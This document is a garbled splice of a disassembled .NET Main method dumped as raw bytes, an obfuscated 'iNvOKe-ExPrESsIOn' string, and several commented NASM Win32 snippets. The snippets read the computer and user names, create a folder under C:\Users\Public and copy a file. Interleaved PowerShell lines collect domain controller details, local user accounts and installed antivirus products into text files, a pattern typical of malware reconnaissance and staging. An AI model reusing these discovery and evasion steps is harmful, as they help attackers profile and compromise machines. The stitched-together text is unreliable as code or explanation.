**************************************************************
* FUNCTION *
**************************************************************
int __fastcall Main(int args, int * param_2)
int EAX:4 <RETURN>
int ECX:4 args
int * EDX:4 param_2
.NET CLR Managed Code
Main
004044ac 14 13 17 db[1315]
14 13 18
14 13 19
004044ac [0] 14h, 13h, 17h, 14h,
004044b0 [4] 13h, 18h, 14h, 13h,
004044b4 [8] 19h, 73h, 7Ah, 0h,
004044b8 [12] 0h, 6h, 13h, 1Ah,
004044bc [16] 28h, E8h, 0h, 0h,
004044c0 [20] Ah, 73h, 79h, 0h,
004044c4 [24] 0h, 6h, Ah, 16h,
004044c8 [28] Bh, 7Eh, 14h, 0h,
004044cc [32] 0h, Ah, Ch, 11h,
004044d0 [36] 1Ah, 73h, 3Ah, 0h,
004044d4 [40] 0h, 6h, 7Dh, 58h,
004044d8 [44] 0h, 0h, 4h, 6h,
004044dc [48] 11h, 1Ah, 7Bh, 58h,
004044e0 [52] 0h, 0h, 4h, 73h,
004044e4 [56] 4Dh, 0h, 0h, 6h,
004044e8 [60] Dh, 11h, 1Ah, 16h,
004044ec [64] 73h, E9h, 0h, 0h,
004044f0 [68] Ah, 7Dh, 59h, 0h,
004044f4 [72] 0h, 4h, 28h, 27h,
004044f8 [76] 0h, 0h, Ah, 14h,
004044fc [80] FEh, 6h, 78h, 0h,
00404500 [84] 0h, 6h, 73h, EAh,
00404504 [88] 0h, 0h, Ah, 6Fh,
00404508 [92] EBh, 0h, 0h, Ah,
0040450c [96] 9h, 28h, ECh, 0h,
00404510 [100] 0h, Ah, 13h, 4h,
00404514 [104] 11h, 4h, 16h, 6Fh,
00404518 [108] EDh, 0h, 0h, Ah,
0040451c [112] 11h, 4h, 6Fh, EEh,
00404520 [116] 0h, 0h, Ah, 28h,
00404524 [120] EFh, 0h, 0h, Ah,
00404528 [124] 13h, 5h, 11h, 5h,
0040452c [128] 11h, 4h, 6Fh, F0h,
00404530 [132] 0h, 0h, Ah, 11h,
00404534 [136] 5h, 6Fh, F1h, 0h,
00404538 [140] 0h, Ah, 6Fh, F2h,
0040453c [144] 0h, 0h, Ah, 11h,
00404540 [148] 17h, 2Dh, Fh, 11h,
00404544 [152] 1Ah, FEh, 6h, 7Bh,
00404548 [156] 0h, 0h, 6h, 73h,
0040454c [160] F3h, 0h, 0h, Ah,
00404550 [164] 13h, 17h, 11h, 17h,
00404554 [168] 6Fh, F4h, 0h, 0h,
00404558 [172] Ah, 73h, F5h, 0h,
0040455c [176] 0h, Ah, 13h, 6h,
00404560 [180] 28h, 36h, 0h, 0h,
00404564 [184] 6h, 2Ch, 1Ch, 72h,
00404568 [188] 1h, 0h, 0h, 70h,
0040456c [192] 13h, 7h, 2Bh, 9h,
00404570 [196] 11h, 6h, 11h, 7h,
00404574 [200] 6Fh, F6h, 0h, 0h,
00404578 [204] Ah, 28h, F7h, 0h,
0040457c [208] 0h, Ah, 25h, 13h,
00404580 [212] 7h, 2Dh, EDh, 11h,
00404584 [216] 6h, 6Fh, F8h, 0h,
00404588 [220] 0h, Ah, 73h, F9h,
0040458c [224] 0h, 0h, Ah, 13h,
00404590 [228] 8h, 11h, 8h, 11h,
00404594 [232] 18h, 2Dh, Fh, 11h,
00404598 [236] 1Ah, FEh, 6h, 7Ch,
0040459c [240] 0h, 0h, 6h, 73h,
004045a0 [244] F3h, 0h, 0h, Ah,
004045a4 [248] 13h, 18h, 11h, 18h,
004045a8 [252] 6Fh, FAh, 0h, 0h,
004045ac [256] Ah, 16h, 13h, 9h,
004045b0 [260] 16h, 13h, Ah, 2h,
004045b4 [264] 13h, 1Ch, 16h, 13h,
004045b8 [268] 1Dh, 38h, C7h, 0h,
004045bc [272] 0h, 0h, 11h, 1Ch,
004045c0 [276] 11h, 1Dh, 9Ah, 13h,
004045c4 [280] Bh, 11h, Bh, 72h,
004045c8 [284] 7Bh, 2h, 0h, 70h,
004045cc [288] 17h, 28h, FBh, 0h,
004045d0 [292] 0h, Ah, 2Dh, 7h,
004045d4 [296] 17h, Bh, 38h, 9Eh,
004045d8 [300] 0h, 0h, 0h, 11h,
004045dc [304] Bh, 72h, 87h, 2h,
004045e0 [308] 0h, 70h, 19h, 6Fh,
004045e4 [312] FCh, 0h, 0h, Ah,
004045e8 [316] 2Ch, 61h, 11h, Bh,
004045ec [320] 17h, 8Dh, 33h, 0h,
004045f0 [324] 0h, 1h, 13h, 1Eh,
004045f4 [328] 11h, 1Eh, 16h, 72h,
004045f8 [332] 99h, 2h, 0h, 70h,
004045fc [336] A2h, 11h, 1Eh, 18h,
00404600 [340] 17h, 6Fh, FDh, 0h,
00404604 [344] 0h, Ah, 13h, Ch,
00404608 [348] 11h, Ch, 8Eh, 69h,
0040460c [352] 18h, 2Eh, 20h, 72h,
00404610 [356] 9Dh, 2h, 0h, 70h,
00404614 [360] 28h, 27h, 0h, 0h,
00404618 [364] Ah, 6Fh, 28h, 0h,
0040461c [368] 0h, Ah, 16h, 1Fh,
00404620 [372] 10h, 28h, D5h, 0h,
00404624 [376] 0h, Ah, 26h, 17h,
00404628 [380] 13h, 1Bh, DDh, 9Dh,
0040462c [384] 3h, 0h, 0h, 11h,
00404630 [388] Ch, 17h, 9Ah, 17h,
00404634 [392] 8Dh, 62h, 0h, 0h,
00404638 [396] 1h, 13h, 1Fh, 11h,
0040463c [400] 1Fh, 16h, 1Fh, 22h,
00404640 [404] 9Dh, 11h, 1Fh, 6Fh,
00404644 [408] FEh, 0h, 0h, Ah,
00404648 [412] Ch, 2Bh, 2Eh, 11h,
0040464c [416] Bh, 72h, 7Ch, 3h,
00404650 [420] 0h, 70h, 17h, 28h,
00404654 [424] FBh, 0h, 0h, Ah,
00404658 [428] 2Dh, 8h, 11h, Ah,
0040465c [432] 17h, 58h, 13h, 9h,
00404660 [436] 2Bh, 2Eh, 11h, Bh,
00404664 [440] 72h, 86h, 3h, 0h,
00404668 [444] 70h, 17h, 28h, FBh,
0040466c [448] 0h, 0h, Ah, 2Dh,
00404670 [452] 8h, 28h, FFh, 0h,
00404674 [456] 0h, Ah, 26h, 2Bh,
00404678 [460] 17h, 11h, Ah, 17h,
0040467c [464] 58h, 13h, Ah, 11h,
00404680 [468] 1Dh, 17h, 58h, 13h,
00404684 [472] 1Dh, 11h, 1Dh, 11h,
00404688 [476] 1Ch, 8Eh, 69h, 3Fh,
0040468c [480] 2Eh, FFh, FFh, FFh,
00404690 [484] 28h, 46h, 0h, 0h,
00404694 [488] Ah, 13h, Dh, 11h,
00404698 [492] Dh, 72h, 94h, 3h,
0040469c [496] 0h, 70h, 6Fh, 0h,
004046a0 [500] 1h, 0h, Ah, 13h,
004046a4 [504] Eh, 11h, Eh, 28h,
004046a8 [508] 1h, 1h, 0h, Ah,
004046ac [512] 73h, 2h, 1h, 0h,
004046b0 [516] Ah, 13h, Fh, 11h,
004046b4 [520] Fh, 6Fh, 3h, 1h,
004046b8 [524] 0h, Ah, 13h, 10h,
004046bc [528] 8h, 28h, Dh, 0h,
004046c0 [532] 0h, Ah, 2Dh, 10h,
004046c4 [536] 8h, 11h, 10h, 28h,
004046c8 [540] 4h, 1h, 0h, Ah,
004046cc [544] 16h, 13h, 1Bh, DDh,
004046d0 [548] F8h, 2h, 0h, 0h,
004046d4 [552] 11h, 5h, 11h, 10h,
004046d8 [556] 6Fh, 5h, 1h, 0h,
004046dc [560] Ah, 26h, DEh, Ch,
004046e0 [564] 11h, Fh, 2Ch, 7h,
004046e4 [568] 11h, Fh, 6Fh, 5Eh,
004046e8 [572] 0h, 0h, Ah, DCh,
004046ec [576] DEh, Ch, 11h, Eh,
004046f0 [580] 2Ch, 7h, 11h, Eh,
004046f4 [584] 6Fh, 5Eh, 0h, 0h,
004046f8 [588] Ah, DCh, 14h, 13h,
004046fc [592] 11h, 72h, AAh, 3h,
00404700 [596] 0h, 70h, 73h, 6h,
00404704 [600] 1h, 0h, Ah, 13h,
00404708 [604] 12h, 11h, 9h, 13h,
0040470c [608] 13h, 38h, AEh, 1h,
00404710 [612] 0h, 0h, 11h, 12h,
00404714 [616] 2h, 11h, 13h, 9Ah,
00404718 [620] 6Fh, 7h, 1h, 0h,
0040471c [624] Ah, 13h, 14h, 11h,
00404720 [628] 14h, 6Fh, 8h, 1h,
00404724 [632] 0h, Ah, 39h, 6Ch,
00404728 [636] 1h, 0h, 0h, 11h,
0040472c [640] 14h, 6Fh, 9h, 1h,
00404730 [644] 0h, Ah, 6Fh, Ah,
00404734 [648] 1h, 0h, Ah, 19h,
00404738 [652] 40h, 5Ah, 1h, 0h,
0040473c [656] 0h, 2h, 11h, 13h,
00404740 [660] 9Ah, 12h, 15h, 28h,
00404744 [664] Bh, 1h, 0h, Ah,
00404748 [668] 3Ah, 4Ah, 1h, 0h,
0040474c [672] 0h, 11h, 11h, 2Ch,
00404750 [676] Ah, 11h, 5h, 11h,
00404754 [680] 11h, 6Fh, Ch, 1h,
00404758 [684] 0h, Ah, 26h, 11h,
0040475c [688] 14h, 6Fh, 9h, 1h,
00404760 [692] 0h, Ah, 18h, 6Fh,
00404764 [696] Dh, 1h, 0h, Ah,
00404768 [700] 6Fh, Eh, 1h, 0h,
0040476c [704] Ah, 6Fh, Fh, 1h,
00404770 [708] 0h, Ah, 72h, 1h,
00404774 [712] 0h, 0h, 70h, 28h,
00404778 [716] C3h, 0h, 0h, Ah,
0040477c [720] 2Ch, 19h, 11h, 14h,
00404780 [724] 6Fh, 9h, 1h, 0h,
00404784 [728] Ah, 17h, 6Fh, Dh,
00404788 [732] 1h, 0h, Ah, 6Fh,
0040478c [736] Eh, 1h, 0h, Ah,
00404790 [740] 13h, 11h, 38h, 23h,
00404794 [744] 1h, 0h, 0h, 11h,
00404798 [748] 14h, 6Fh, 9h, 1h,
0040479c [752] 0h, Ah, 18h, 6Fh,
004047a0 [756] Dh, 1h, 0h, Ah,
004047a4 [760] 6Fh, Eh, 1h, 0h,
004047a8 [764] Ah, 72h, DAh, 3h,
004047ac [768] 0h, 70h, 28h, C3h,
004047b0 [772] 0h, 0h, Ah, 2Dh,
004047b4 [776] 23h, 11h, 14h, 6Fh,
004047b8 [780] 9h, 1h, 0h, Ah,
004047bc [784] 18h, 6Fh, Dh, 1h,
004047c0 [788] 0h, Ah, 6Fh, Eh,
004047c4 [792] 1h, 0h, Ah, 6Fh,
004047c8 [796] 10h, 1h, 0h, Ah,
004047cc [800] 72h, E4h, 3h, 0h,
004047d0 [804] 70h, 28h, C3h, 0h,
004047d4 [808] 0h, Ah, 2Ch, 28h,
004047d8 [812] 11h, 5h, 11h, 14h,
004047dc [816] 6Fh, 9h, 1h, 0h,
004047e0 [820] Ah, 17h, 6Fh, Dh,
004047e4 [824] 1h, 0h, Ah, 6Fh,
004047e8 [828] Eh, 1h, 0h, Ah,
004047ec [832] 17h, 8Ch, 8Dh, 0h,
004047f0 [836] 0h, 1h, 6Fh, 11h,
004047f4 [840] 1h, 0h, Ah, 26h,
004047f8 [844] 14h, 13h, 11h, 38h,
004047fc [848] BAh, 0h, 0h, 0h,
00404800 [852] 11h, 14h, 6Fh, 9h,
00404804 [856] 1h, 0h, Ah, 18h,
00404808 [860] 6Fh, Dh, 1h, 0h,
0040480c [864] Ah, 6Fh, Eh, 1h,
00404810 [868] 0h, Ah, 72h, F0h,
00404814 [872] 3h, 0h, 70h, 28h,
00404818 [876] C3h, 0h, 0h, Ah,
0040481c [880] 2Dh, 23h, 11h, 14h,
00404820 [884] 6Fh, 9h, 1h, 0h,
00404824 [888] Ah, 18h, 6Fh, Dh,
00404828 [892] 1h, 0h, Ah, 6Fh,
0040482c [896] Eh, 1h, 0h, Ah,
00404830 [900] 6Fh, 10h, 1h, 0h,
00404834 [904] Ah, 72h, FCh, 3h,
00404838 [908] 0h, 70h, 28h, C3h,
0040483c [912] 0h, 0h, Ah, 2Ch,
00404840 [916] 25h, 11h, 5h, 11h,
00404844 [920] 14h, 6Fh, 9h, 1h,
00404848 [924] 0h, Ah, 17h, 6Fh,
0040484c [928] Dh, 1h, 0h, Ah,
00404850 [932] 6Fh, Eh, 1h, 0h,
00404854 [936] Ah, 16h, 8Ch, 8Dh,
00404858 [940] 0h, 0h, 1h, 6Fh,
0040485c [944] 11h, 1h, 0h, Ah,
00404860 [948] 26h, 14h, 13h, 11h,
00404864 [952] 2Bh, 54h, 11h, 5h,
00404868 [956] 11h, 14h, 6Fh, 9h,
0040486c [960] 1h, 0h, Ah, 17h,
00404870 [964] 6Fh, Dh, 1h, 0h,
00404874 [968] Ah, 6Fh, Eh, 1h,
00404878 [972] 0h, Ah, 11h, 14h,
0040487c [976] 6Fh, 9h, 1h, 0h,
00404880 [980] Ah, 18h, 6Fh, Dh,
00404884 [984] 1h, 0h, Ah, 6Fh,
00404888 [988] Eh, 1h, 0h, Ah,
0040488c [992] 6Fh, 11h, 1h, 0h,
00404890 [996] Ah, 26h, 14h, 13h,
00404894 [1000] 11h, 2Bh, 23h, 11h,
00404898 [1004] 11h, 2Ch, 13h, 11h,
0040489c [1008] 5h, 11h, 11h, 2h,
004048a0 [1012] 11h, 13h, 9Ah, 6Fh,
004048a4 [1016] 11h, 1h, 0h, Ah,
004048a8 [1020] 26h, 14h, 13h, 11h,
004048ac [1024] 2Bh, Ch, 11h, 5h,
004048b0 [1028] 2h, 11h, 13h, 9Ah,
004048b4 [1032] 6Fh, 12h, 1h, 0h,
004048b8 [1036] Ah, 26h, 11h, 13h,
004048bc [1040] 17h, 58h, 13h, 13h,
004048c0 [1044] 11h, 13h, 2h, 8Eh,
004048c4 [1048] 69h, 3Fh, 48h, FEh,
004048c8 [1052] FFh, FFh, 11h, 11h,
004048cc [1056] 2Ch, Ah, 11h, 5h,
004048d0 [1060] 11h, 11h, 6Fh, Ch,
004048d4 [1064] 1h, 0h, Ah, 26h,
004048d8 [1068] 11h, 5h, 72h, Ah,
004048dc [1072] 4h, 0h, 70h, 6Fh,
004048e0 [1076] 13h, 1h, 0h, Ah,
004048e4 [1080] 26h, 11h, 5h, 72h,
004048e8 [1084] 20h, 4h, 0h, 70h,
004048ec [1088] 6Fh, Ch, 1h, 0h,
004048f0 [1092] Ah, 26h, 11h, 5h,
004048f4 [1096] 11h, 6h, 11h, 8h,
004048f8 [1100] 14h, 11h, 19h, 2Dh,
004048fc [1104] Fh, 11h, 1Ah, FEh,
00404900 [1108] 6h, 7Dh, 0h, 0h,
00404904 [1112] 6h, 73h, 14h, 1h,
00404908 [1116] 0h, Ah, 13h, 19h,
0040490c [1120] 11h, 19h, 14h, 6Fh,
00404910 [1124] 2h, 0h, 0h, 2Bh,
00404914 [1128] 26h, 6h, 6Fh, 73h,
00404918 [1132] 0h, 0h, 6h, 2Dh,
0040491c [1136] 10h, 11h, 1Ah, 7Bh,
00404920 [1140] 59h, 0h, 0h, 4h,
00404924 [1144] 1Fh, 64h, 6Fh, 16h,
00404928 [1148] 1h, 0h, Ah, 2Ch,
0040492c [1152] E8h, 11h, 5h, 6Fh,
00404930 [1156] 17h, 1h, 0h, Ah,
00404934 [1160] 11h, 5h, 6Fh, 18h,
00404938 [1164] 1h, 0h, Ah, 6Fh,
0040493c [1168] 19h, 1h, 0h, Ah,
00404940 [1172] 1Bh, 33h, 1Dh, 11h,
00404944 [1176] 1Ah, 7Bh, 58h, 0h,
00404948 [1180] 0h, 4h, 11h, 5h,
0040494c [1184] 6Fh, 18h, 1h, 0h,
00404950 [1188] Ah, 6Fh, 1Ah, 1h,
00404954 [1192] 0h, Ah, 6Fh, E3h,
00404958 [1196] 0h, 0h, Ah, 6Fh,
0040495c [1200] E4h, 0h, 0h, Ah,
00404960 [1204] DEh, Ch, 11h, 5h,
00404964 [1208] 2Ch, 7h, 11h, 5h,
00404968 [1212] 6Fh, 5Eh, 0h, 0h,
0040496c [1216] Ah, DCh, 11h, 4h,
00404970 [1220] 6Fh, 1Bh, 1h, 0h,
00404974 [1224] Ah, DEh, Ch, 11h,
00404978 [1228] 4h, 2Ch, 7h, 11h,
0040497c [1232] 4h, 6Fh, 5Eh, 0h,
00404980 [1236] 0h, Ah, DCh, DEh,
00404984 [1240] 28h, 13h, 16h, 72h,
00404988 [1244] 2Eh, 4h, 0h, 70h,
0040498c [1248] 11h, 16h, 6Fh, E3h,
00404990 [1252] 0h, 0h, Ah, 28h,
00404994 [1256] A6h, 0h, 0h, Ah,
00404998 [1260] 28h, 27h, 0h, 0h,
0040499c [1264] Ah, 6Fh, 28h, 0h,
004049a0 [1268] 0h, Ah, 16h, 1Fh,
004049a4 [1272] 10h, 28h, D5h, 0h,
004049a8 [1276] 0h, Ah, 26h, DEh,
004049ac [1280] 0h, 7h, 2Ch, 15h,
004049b0 [1284] 72h, 5Ch, 4h, 0h,
004049b4 [1288] 70h, 28h, 27h, 0h,
004049b8 [1292] 0h, Ah, 6Fh, 28h,
004049bc [1296] 0h, 0h, Ah, 28h,
004049c0 [1300] AAh, 0h, 0h, Ah,
004049c4 [1304] 26h, 6h, 6Fh, 75h,
004049c8 [1308] 0h, 0h, 6h, 2Ah,
004049cc [1312] 11h, 1Bh, 2Ah
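section .data
; NASM syntax, Win32 (32-bit) target.
; computerName: receive buffer for GetComputerNameA.
; The original `db ' ' * 256` is ONE arithmetic expression (0x20 * 256 =
; 0x2000); NASM truncates it to a single byte with a "byte data exceeds
; bounds" warning, so the buffer was 1 byte, not 256. `times` repeats the
; directive and yields a real 256-byte, zero-filled region.
computerName times 256 db 0
; bufferLen: in/out size for GetComputerNameA. It holds the buffer capacity
; on entry and the API writes the name length back into it, so it must be a
; writable dword whose ADDRESS (not value) is passed to the call.
bufferLen dd 256
section .text
global _start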
004087d7 49 4e 43 4f 52 utf8 u8"INCORRECT_PASSWORD" [2a3]
52 45 43 54 5f
50 41 53 53 57
73 C9 00 00 0A 0A 17 28 CD 00 00 0A 0B 12 01 28 CE 00 00 0A
1F 0D 33 07 28 CF 00 00 0A 2B 4F 12 01 28 CE 00 00 0A 1E 33
23 06 6F D0 00 00 0A 16 31 D4 06 06 6F D0 00 00 0A 17 59 6F
D1 00 00 0A 72 49 02 00 70 28 D2 00 00 0A 2B BA 12 01 28 D3
00 00 0A 2C B1 06 12 01 28 D3 00 00 0A 6F CB 00 00 0A 72 51
02 00 70 28 D2 00 00 0A 2B 98 06 2A
iNvOKe-ExPrESsIOn
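;-----------------------------------------------------------------------
; _start: process entry. Reads the local machine's name via
; GetComputerNameA into computerName, then exits.
; ABI:   Win32 stdcall, 32-bit: arguments pushed right-to-left, callee
;        pops them. Import symbols may need toolchain decoration
;        (_Name@N) depending on the linker / import library in use.
; Out:   exit code 0 on success, 1 if GetComputerNameA reported failure.
; Clobb: eax, plus ecx/edx/flags inside the API calls.
;-----------------------------------------------------------------------
extern GetComputerNameA
extern ExitProcess

_start:
        ; BOOL GetComputerNameA(LPSTR lpBuffer, LPDWORD nSize)
        ; nSize is a POINTER (in: buffer capacity, out: name length).
        ; The original `push dword [bufferLen]` pushed the VALUE 256,
        ; which the API would then dereference as an address.
        push    dword bufferLen         ; &bufferLen (nSize, in/out)
        lea     eax, [computerName]
        push    eax                     ; lpBuffer
        call    GetComputerNameA        ; eax != 0 on success
        test    eax, eax
        jz      .fail

        push    dword 0                 ; exit code 0: success
        call    ExitProcess

.fail:
        push    dword 1                 ; exit code 1: lookup failed
        call    ExitProcess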
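section .data
; NASM syntax, Win32 (32-bit) target.
; userName: receive buffer for GetUserNameA.
; The original `db ' ' * 256` is ONE arithmetic expression (0x20 * 256 =
; 0x2000); NASM truncates it to a single byte with a "byte data exceeds
; bounds" warning, so the buffer was 1 byte, not 256. `times` repeats the
; directive and yields a real 256-byte, zero-filled region.
userName times 256 db 0
; bufferLen: in/out size for GetUserNameA. It holds the buffer capacity
; (including the terminating NUL) on entry and the API writes the number of
; characters copied back into it, so it must be a writable dword whose
; ADDRESS (not value) is passed to the call.
bufferLen dd 256
section .text
global _start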
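;-----------------------------------------------------------------------
; _start: process entry. Reads the current user's account name via
; GetUserNameA into userName, then exits.
; ABI:   Win32 stdcall, 32-bit: arguments pushed right-to-left, callee
;        pops them. Import symbols may need toolchain decoration
;        (_Name@N) depending on the linker / import library in use.
; Out:   exit code 0 on success, 1 if GetUserNameA reported failure.
; Clobb: eax, plus ecx/edx/flags inside the API calls.
;-----------------------------------------------------------------------
extern GetUserNameA
extern ExitProcess

_start:
        ; BOOL GetUserNameA(LPSTR lpBuffer, LPDWORD pcbBuffer)
        ; pcbBuffer is a POINTER (in: capacity incl. NUL, out: chars copied).
        ; The original `push dword [bufferLen]` pushed the VALUE 256,
        ; which the API would then dereference as an address.
        push    dword bufferLen         ; &bufferLen (pcbBuffer, in/out)
        lea     eax, [userName]
        push    eax                     ; lpBuffer
        call    GetUserNameA            ; eax != 0 on success
        test    eax, eax
        jz      .fail

        push    dword 0                 ; exit code 0: success
        call    ExitProcess

.fail:
        push    dword 1                 ; exit code 1: lookup failed
        call    ExitProcess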
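section .data
; NASM syntax, Win32 (32-bit) target.
; dirPath: NUL-terminated ANSI path handed to CreateDirectoryA.
dirPath db 'C:\Users\Public\Public Files', 0
section .text
global _start
extern CreateDirectoryA
extern ExitProcess
;-----------------------------------------------------------------------
; _start: process entry. Creates dirPath, then falls through to the exit
; sequence that follows this block.
; ABI:   Win32 stdcall, 32-bit: arguments pushed right-to-left, callee
;        pops them. Import symbols may need toolchain decoration
;        (_Name@N) depending on the linker / import library in use.
; Out:   falls through on success; exits with code 1 if CreateDirectoryA
;        reports failure. Note the API also reports failure when the
;        directory already exists (GetLastError = ERROR_ALREADY_EXISTS);
;        a caller wanting idempotent behaviour has to distinguish that.
; Clobb: eax, plus ecx/edx/flags inside the API call.
;-----------------------------------------------------------------------
_start:
        ; BOOL CreateDirectoryA(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes)
        push    dword 0                 ; lpSecurityAttributes = NULL (default DACL)
        lea     eax, [dirPath]
        push    eax                     ; lpPathName
        call    CreateDirectoryA        ; eax != 0 on success
        test    eax, eax
        jnz     .created
        push    dword 1                 ; exit code 1: CreateDirectoryA failed
        call    ExitProcess
.created: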
nltest /dsgetdc:$env:USERDOMAIN 2>$null | Out-File -FilePath (Join-Path $targetDir 'DCinfo.txt') -Force
Get-WmiObject -Class Win32_UserAccount | Out-File -FilePath (Join-Path $targetDir 'localusers.txt') -Force
wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value 2>$null | Out-File -FilePath (Join-Path $targetDir 'AVinfo.txt') -Force
; Normal termination: ExitProcess(uExitCode = 0). stdcall -- the callee
; pops the single argument and the call never returns.
xor     eax, eax                        ; uExitCode = 0
push    eax
call    ExitProcess
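section .data
; NASM syntax, Win32 (32-bit) target.
; Example paths (placeholders); both are NUL-terminated ANSI strings.
srcFile db 'C:\path\to\source.txt', 0
dstFile db 'C:\path\to\destination.txt', 0
section .text
global _start
extern CopyFileA
extern ExitProcess
;-----------------------------------------------------------------------
; _start: process entry. Copies srcFile to dstFile, refusing to overwrite
; an existing destination, then exits.
; ABI:   Win32 stdcall, 32-bit: arguments pushed RIGHT-TO-LEFT (last
;        parameter first), callee pops. The original pushed src, dst, 1
;        in that order, which hands CopyFileA lpExistingFileName = 1 and
;        bFailIfExists = &srcFile -- the API would then dereference a
;        bogus string pointer and fault. Import symbols may need toolchain
;        decoration (_Name@N) depending on the linker / import library.
; Out:   exit code 0 on success, 1 if CopyFileA reported failure.
; Clobb: eax, plus ecx/edx/flags inside the API calls.
;-----------------------------------------------------------------------
_start:
        ; BOOL CopyFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, BOOL bFailIfExists)
        push    dword 1                 ; bFailIfExists = TRUE (3rd arg, pushed first)
        lea     eax, [dstFile]
        push    eax                     ; lpNewFileName (2nd arg)
        lea     eax, [srcFile]
        push    eax                     ; lpExistingFileName (1st arg, pushed last)
        call    CopyFileA               ; eax != 0 on success
        test    eax, eax
        jz      .fail

        push    dword 0                 ; exit code 0: success
        call    ExitProcess

.fail:
        push    dword 1                 ; exit code 1: copy failed
        call    ExitProcess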